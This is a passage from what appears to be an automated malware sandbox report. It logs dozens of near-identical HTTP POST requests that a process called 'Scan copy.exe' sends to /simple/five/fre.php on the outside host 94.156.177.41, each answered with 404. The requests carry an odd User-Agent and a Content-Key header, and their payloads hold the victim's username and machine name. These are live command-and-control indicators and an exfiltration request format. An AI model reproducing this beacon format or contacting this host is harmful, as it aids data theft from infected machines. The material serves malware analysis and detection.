                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.74982094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:00.971061945 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:01.091238976 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:02.364192009 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.74982394.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:02.630995989 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:02.750976086 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:04.221290112 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.74982994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:04.490891933 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:04.611133099 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:06.031249046 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:05 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.74983394.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:06.305591106 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:06.425626993 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:07.898154020 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:07 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.74983994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:08.162962914 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:08.283034086 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:09.702014923 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:09 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.74984494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:09.972512007 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:10.092586994 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:11.605264902 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:11 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.74984994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:11.866663933 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:11.986717939 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:13.478025913 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:13 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.74985494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:13.749624014 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:13.869863987 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:15.453273058 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:15 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.74985994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:15.723330975 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:15.847454071 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:17.303266048 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:17 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.74986494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:17.651669025 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:17.771783113 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:19.281728029 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:19 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.74986994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:19.551938057 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:19.671910048 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:21.096005917 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:20 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.74987494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:21.370218039 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:21.490326881 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:22.994276047 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:22 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.74988094.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:23.259109974 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:23.380780935 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:24.698816061 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:24 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            38192.168.2.74988594.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:24.957735062 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:25.077799082 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:26.498522043 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.74988994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:26.779984951 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:26.899972916 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:28.370992899 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:28 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.74989394.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:28.627492905 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:28.747512102 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:30.274113894 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            41192.168.2.74989894.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:30.535348892 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:30.655415058 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:32.167747974 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            42192.168.2.74990394.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:32.434931993 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:32.556716919 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:34.019035101 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:33 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            43192.168.2.74990994.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:34.287918091 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:34.408050060 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:35.875049114 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:35 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            44192.168.2.74991494.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:36.147876024 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
                            Nov 28, 2024 09:15:36.267971039 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                            Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                            Nov 28, 2024 09:15:37.777539968 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Thu, 28 Nov 2024 08:15:37 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            45192.168.2.74991894.156.177.41807380C:\Users\user\Desktop\Scan copy.exe
                            TimestampBytes transferredDirectionData
                            Nov 28, 2024 09:15:38.036020994 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 165
                            Connection: close
